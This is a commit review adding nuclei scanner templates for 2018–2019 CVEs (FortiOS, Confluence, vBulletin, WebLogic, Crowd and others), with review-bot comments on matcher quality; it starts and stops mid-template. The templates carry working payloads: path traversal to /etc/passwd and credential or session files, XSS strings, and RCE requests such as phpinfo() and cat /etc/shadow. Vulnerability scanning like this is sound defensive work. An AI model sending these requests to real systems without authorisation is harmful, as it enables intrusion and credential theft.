status:
|
||||
- 200
|
|
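Review bot: `severity: High` should be lowercase `high` for consistency with the rest of the commit. The two paths use double-encoded backslashes (`%255c`) followed by `..%255c/` segments, which is the documented trigger for this Spring MVC resource-handler bug on Windows hosts, and the matcher on `for 16-bit app support` from `win.ini` together with status 200 is specific enough; a comment saying the check is Windows-only would save users time when they see no hits on Linux deployments.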
@ -0,0 +1,15 @@
|
|||
id: CVE-2018-13379
|
||||
|
||||
info:
|
||||
name: FortiOS - Credentials Disclosure
|
||||
author: organiccrap
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "var fgt_lang ="
|
|
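Review bot: The single word matcher `var fgt_lang =` only shows that the `/remote/fgt_lang` handler answered with its language-loader wrapper; it does not by itself show that the traversal into `sslvpn_websession` succeeded, and there is no status matcher. Pair it with a `status: 200` matcher under `matchers-condition: and` and add a second indicator that only appears when the session file, rather than a normal language file, is returned, so that a device serving a default language file for an unknown `lang` value does not register as vulnerable.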
@ -0,0 +1,19 @@
|
|||
id: CVE-2018-14728
|
||||
|
||||
info:
|
||||
name: Responsive filemanager 9.13.1 - SSRF/LFI
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/filemanager/upload.php"
|
||||
|
||||
body: "fldr=&url=file:///etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
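Review bot: The POST sends `body: "fldr=&url=file:///etc/passwd"` without a `Content-Type` header. PHP only populates `$_POST` for `application/x-www-form-urlencoded` or `multipart/form-data` bodies, so unless nuclei adds that header by default, `upload.php` will see an empty `url` parameter and the template will never match. Add `headers:` with `Content-Type: application/x-www-form-urlencoded` as the Grafana snapshot template further down does for its JSON body. The regex matcher has no status check, but for a file read that returns passwd content that is acceptable.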
@ -0,0 +1,16 @@
|
|||
id: CVE-2018-16341
|
||||
|
||||
info:
|
||||
name: Nuxeo Authentication Bypass Remote Code Execution
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "31333333337"
|
||||
part: body
|
|
@ -0,0 +1,17 @@
|
|||
id: CVE-2018-18069
|
||||
|
||||
info:
|
||||
name: Wordpress unauthenticated stored xss
|
||||
author: nadino
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin.php"
|
||||
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'
|
|
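Review bot: Same missing `Content-Type` problem as the Responsive filemanager template: the form body on the `body:` line needs `Content-Type: application/x-www-form-urlencoded` for `admin.php` to read `icl_post_action` and `locale_file_name_en`. The request also carries no authentication, while the description added for this template earlier in the commit says the injection happens in an authenticated request; if the DSL match (`status_code==302` plus the `_icl_current_admin_language` cookie) is what you observed from an unauthenticated request, document that, otherwise the template cannot confirm the stored XSS on its own.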
@ -0,0 +1,16 @@
|
|||
id: CVE-2018-19439
|
||||
|
||||
info:
|
||||
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
|
||||
author: madrobot & dwisiswant0
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1337)</script><!--</TITLE>"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2018-20824
|
||||
|
||||
info:
|
||||
name: Atlassian Jira WallboardServlet XSS
|
||||
author: madrobot & dwisiswant0
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- (?mi)timeout:\salert\(document\.domain\)
|
||||
part: body
|
|
@ -0,0 +1,16 @@
|
|||
id: CVE-2018-2791
|
||||
|
||||
info:
|
||||
name: Oracle WebCenter Sites XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1337)</script>"
|
||||
part: body
|
|
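Review bot: The path contains the literal placeholder `cid={ID}`; nuclei will send it as-is, so the servlet receives an invalid content id and may never reach the code path that reflects `cs_imagedir`. Either replace it with a value that works for the `confirmmakeasset` page on a default install, or drop the `cid` parameter if the reflection does not depend on it, and test the final path against a known-vulnerable instance. The matcher (status 200 plus the unencoded script tag) is fine once the request is valid.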
@ -0,0 +1,19 @@
|
|||
id: CVE-2018-3714
|
||||
info:
|
||||
name: node-srv Path Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2018-3760
|
||||
|
||||
info:
|
||||
name: Rails cve-2018-3760
|
||||
author: 0xrudra
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2018-5230
|
||||
|
||||
info:
|
||||
name: Atlassian Confluence Status-List XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "SRC=\"javascript:alert(1337)\">"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2018-7490
|
||||
|
||||
info:
|
||||
name: uWSGI PHP Plugin Directory Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-10475
|
||||
|
||||
info:
|
||||
name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
part: body
|
|
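Review bot: The path hard-codes `Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96` twice (as a query parameter and inside the `json=` blob). Crumbs are per-instance CSRF tokens tied to the session that issued them, so this value is meaningless on any other target; since this is a GET and the reflection happens in the `label` parameter, drop the crumb and the redundant `json=` copy of the form and keep only the parameters the page needs. A shorter path is also easier to maintain and review. The matcher on the unencoded `<svg/onload=alert(1337)>` with status 200 is appropriate.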
@ -0,0 +1,19 @@
|
|||
id: CVE-2019-11248
|
||||
|
||||
info:
|
||||
name: exposed_pprof
|
||||
author: 0xceeb
|
||||
severity: medium
|
||||
|
||||
# https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0
|
||||
# http://mmcloughlin.com/posts/your-pprof-is-showing
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/debug/pprof/"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Types of profiles available:"
|
||||
- "Profile Descriptions"
|
|
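Review bot: The `id` is `CVE-2019-11248`, which is the Kubernetes kubelet issue of exposing `/debug/pprof` on an unauthenticated port, but the template requests `{{BaseURL}}/debug/pprof/` against any web target and matches generic pprof index text, and both references are generic pprof write-ups. That makes this an exposed-pprof fingerprint rather than a CVE check; either name it as such (and give it a readable `name` instead of `exposed_pprof`) or add something that ties the hit to a kubelet. The two `words` with the default `or` condition and no status matcher will also match any page that merely mentions "Profile Descriptions".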
@ -0,0 +1,21 @@
|
|||
id: CVE-2019-11510
|
||||
|
||||
info:
|
||||
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
|
||||
author: organiccrap
|
||||
severity: high
|
||||
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2019-11580
|
||||
|
||||
info:
|
||||
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Atlassian Crowd and Crowd Data Center
|
||||
# had the pdkinstall development plugin incorrectly enabled in release builds.
|
||||
# Attackers who can send unauthenticated or authenticated requests
|
||||
# to a Crowd or Crowd Data Center instance can exploit this vulnerability
|
||||
# to install arbitrary plugins, which permits remote code execution on
|
||||
# systems running a vulnerable version of Crowd or Crowd Data Center.
|
||||
# All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
|
||||
# from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
|
||||
# from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
|
||||
# from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
|
||||
# and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
|
||||
# -
|
||||
# References:
|
||||
# > https://github.com/jas502n/CVE-2019-11580
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
|
||||
- "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "root:*:"
|
||||
- "bin:*:"
|
||||
condition: and
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
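Review bot: The request `GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow` assumes a plugin exposing a servlet named `exp` is already installed on the target; the template never exercises the `pdkinstall` plugin-upload path that the comment block describes, so a match means someone has already installed the PoC plugin from the referenced repository, not that the instance is unpatched. Please state that in the comments, and consider whether an unauthenticated check of the `pdkinstall` endpoint's presence would better reflect the CVE. Two smaller points: the `words` `root:*:` and `bin:*:` with `condition: and` miss the common `/etc/shadow` forms (`root:$6$...` or `root:!:`), so the matcher fails even when the command runs; and `{{BaseURL}}:8095/...` has the same port-append problem noted on the Jolokia template.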
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-12314
|
||||
|
||||
info:
|
||||
name: Deltek Maconomy 2.2.5 LFIl
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
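Review bot: `name: Deltek Maconomy 2.2.5 LFIl` has a stray trailing `l`; it should read `LFI`. The path and the `root:[x*]:0:0:` regex with status 200 follow the same pattern as the other file-read templates in this commit and need no change.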
@ -0,0 +1,25 @@
|
|||
id: CVE-2019-14322
|
||||
|
||||
info:
|
||||
name: Odoo 12.0 - Local File Inclusion
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
|
||||
- "{{BaseURL}}/web/static/c:/windows/win.ini"
|
||||
- "{{BaseURL}}/base/static/c:/windows/win.ini"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-14974
|
||||
|
||||
info:
|
||||
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "url = window.location.search.split(\"?desktop_url=\")[1]"
|
||||
part: body
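Review bot: the matcher looks for the static script line `url = window.location.search.split("?desktop_url=")[1]`, which is present whether or not `desktop_url=javascript:alert(1337);//itms://` is sent, so the payload contributes nothing to the verdict and only plants an obvious XSS string in the target's logs; either request the page without it or match on the reflected value. `severity: low` is also out of line with the other XSS templates in this commit, which use `medium`.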
|
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2019-15043
|
||||
info:
|
||||
author: bing0o
|
||||
name: Grafana unauthenticated API
|
||||
severity: medium
|
||||
requests:
|
||||
- body: >-
|
||||
{"dashboard":
|
||||
{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
|
||||
[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
|
||||
3600}
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
Host: '{{Hostname}}'
|
||||
User-Agent: Mozilla/5.0
|
||||
matchers:
|
||||
- part: body
|
||||
type: word
|
||||
words:
|
||||
- deleteKey
|
||||
method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/api/snapshots'
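Review bot: this POST creates a real dashboard snapshot on the target (`"title":"Home"`, `"expires": 3600`), so each scan leaves state behind for an hour, and the `deleteKey` matcher confirms creation without the template ever using the key to remove it; document the side effect next to the id and add a `status` matcher beside the body word. The key order (`method` and `path` after `matchers`) parses but differs from every other template here, and `name: Grafana unauthenticated API` is vague for a CVE that concerns the snapshot API specifically.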
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2019-16759-1
|
||||
|
||||
info:
|
||||
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
# Source:- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Version"
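Review bot: the payload `subWidgets[0][config][code]=phpinfo();` executes PHP and then matches `PHP Version`, which dumps the server's full configuration into scanner output; the sibling CVE-2019-16759 template proves execution with an `echo` of a fixed marker instead, and the same approach fits here. The raw request also omits `Host: {{Hostname}}`, which every other raw request in this commit sets explicitly, and the `-1` suffix on the id gives no hint that this is the patch-bypass variant; a comment or a distinct id would.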
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2019-16759
|
||||
|
||||
info:
|
||||
name: 0day RCE in vBulletin v5.0.0-v5.5.4
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
|
||||
|
||||
widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit;
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
|
||||
{"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"}
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "nonexistent:1337"
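Review bot: neither raw request declares a `Content-Type`; the first sends a form-encoded body and the second a JSON body, so depending on how the target parses an untyped POST one of the two may never reach `widgetConfig[code]`. Add `Content-Type: application/x-www-form-urlencoded` to the first and `Content-Type: application/json` to the second so the probe is deterministic; the fixed-marker matcher `nonexistent:1337` is the right pattern.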
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2019-17382
|
||||
|
||||
info:
|
||||
name: Zabbix Authentication Bypass
|
||||
author: Harsh Bothra
|
||||
severity: Critical
|
||||
# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Dashboard</title>"
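Review bot: `severity: Critical` is capitalised while the rest of the commit uses lowercase; normalise to `critical` so severity filtering works. Matching `<title>Dashboard</title>` with status 200 will also fire on a Zabbix instance that deliberately grants guest access to the dashboard, so as written this reports "dashboard reachable" rather than the bypass; note that false positive in a comment or match on content only the bypass exposes.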
|
|
@ -0,0 +1,17 @@
|
|||
id: CVE-2019-18394
|
||||
|
||||
info:
|
||||
name: Openfire Full Read SSRF
|
||||
author: pdteam - nuclei.projectdiscovery.io
|
||||
severity: critical
|
||||
|
||||
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- <h1>Burp Collaborator Server</h1>
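Review bot: the check depends on the target being able to reach the public `burpcollaborator.net` host and on that host's banner staying `<h1>Burp Collaborator Server</h1>`; a target without egress reports clean, and the match string is outside the maintainers' control. At least add a `status` matcher under `matchers-condition: and` and state the egress requirement in a comment. `author: pdteam - nuclei.projectdiscovery.io` also differs from the `pdteam` form used elsewhere in this commit.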
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-19368
|
||||
|
||||
info:
|
||||
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "value=''><sVg/OnLoAD=alert`1337`//'>"
|
||||
part: body
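Review bot: the path `/Login?!'><sVg/OnLoAD=alert`1337`//` is sent with `'`, `<`, `>` and backticks unencoded, whereas the other XSS templates here percent-encode the payload (`%22%3E%3Cscript%3E...`); encode it so the request is well-formed regardless of how the HTTP client treats raw characters, and keep the matcher `value=''><sVg/OnLoAD=alert`1337`//'>` on the decoded reflection.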
|
|
@ -0,0 +1,15 @@
|
|||
id: CVE-2019-19781
|
||||
|
||||
info:
|
||||
name: Citrix ADC Directory Traversal
|
||||
author: organiccrap
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "[global]"
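Review bot: a single word matcher on `[global]` with no status check is thin for a `high` finding, since `[global]` opens any Samba configuration and could be echoed by unrelated content; pair it with `status: 200` under `matchers-condition: and` and a second token from the same `smb.conf`. A reference line is also missing, and reviewers will want the source of the `/vpn/../vpns/cfg/smb.conf` form.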
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-19908
|
||||
|
||||
info:
|
||||
name: phpMyChat-Plus XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1337)</script>"
|
||||
part: body
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2019-19985
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
|
||||
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
|
||||
severity: medium
|
||||
|
||||
# Source:- https://www.exploit-db.com/exploits/48698
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- Name
|
||||
- Email
|
||||
- Status
|
||||
- Created On
|
||||
condition: and
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Content-Disposition: attachment; filename=all-contacts.csv;"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
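Review bot: `Name`, `Email`, `Status` and `Created On` are ordinary words found on most WordPress admin pages, so the body matcher mostly rides on the `Content-Disposition: attachment; filename=all-contacts.csv;` header check; that is fine under `matchers-condition: and`, but the request downloads the full subscriber list (personal data) into scanner output, which deserves a comment beside the exploit-db reference.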
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-2588
|
||||
|
||||
info:
|
||||
name: Oracle Business Intelligence Path Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
|
||||
- "{{BaseURL}}:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'for 16-bit app support'
|
||||
- type: status
|
||||
status:
|
||||
- 200
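Review bot: `{{BaseURL}}:9502/xmlpserver/...` appends a port to a URL that may already include one (or a path), giving `host:443:9502`; the same pattern appears in several templates in this commit. Either drop the port-suffixed path and let the input list carry ports, or build it from `{{Hostname}}`. The 17-level `..%5C` traversal and the `for 16-bit app support` match are otherwise consistent with the other `win.ini` checks.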
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2019-2725
|
||||
|
||||
info:
|
||||
name: Oracle WebLogic Server - Unauthenticated RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
|
||||
# Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.
|
||||
# Easily exploitable vulnerability allows unauthenticated attacker
|
||||
# with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
# Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
|
||||
# --
|
||||
# References:
|
||||
# > https://paper.seebug.org/910/
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/_async/AsyncResponseService"
|
||||
- "{{BaseURL}}:7001/_async/AsyncResponseService"
|
||||
body: >-
|
||||
<?xml version="1.0" encoding="UTF-8" ?>
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
|
||||
xmlns:ads="http://www.w3.org/2005/08/addressing">
|
||||
<soapenv:Header></soapenv:Header>
|
||||
<soapenv:Body></soapenv:Body>
|
||||
</soapenv:Envelope>
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "soapenv:Envelope"
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "X-Powered-By: Servlet"
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
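Review bot: the body is an empty SOAP envelope and the matchers (`soapenv:Envelope`, `X-Powered-By: Servlet`, 200) only establish that `_async/AsyncResponseService` answers, which a patched 10.3.6 or 12.1.3 server also does, so this is component detection rather than the `Unauthenticated RCE` the name promises at `critical`; say so in the name or a comment, as CVE-2020-1147 in this commit does with `... detection`. `{{BaseURL}}:7001/...` has the port-suffix problem noted on CVE-2019-2588.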
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2019-3396
|
||||
info:
|
||||
author: "Harsh Bothra"
|
||||
name: "Atlassian Confluence Path Traversal"
|
||||
severity: High
|
||||
|
||||
# https://github.com/x-f1v3/CVE-2019-3396
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /rest/tinymce/1/macro/preview HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Referer: {{Hostname}}
|
||||
Content-Length: 168
|
||||
Connection: close
|
||||
|
||||
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<param-name>contextConfigLocation</param-name>"
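Review bot: `severity: High` should be lowercase like the rest of the commit. `Content-Length: 168` does match the JSON body as written, but a hardcoded length breaks silently the moment someone edits the body; drop it and let the client compute it. `Referer: {{Hostname}}` lacks a scheme, and the widget `url` makes the target fetch a viddler.com page, which is worth a comment since it is an outbound request from the scanned host.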
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2019-3799
|
||||
info:
|
||||
name: Spring-Cloud-Config-Server Directory Traversal
|
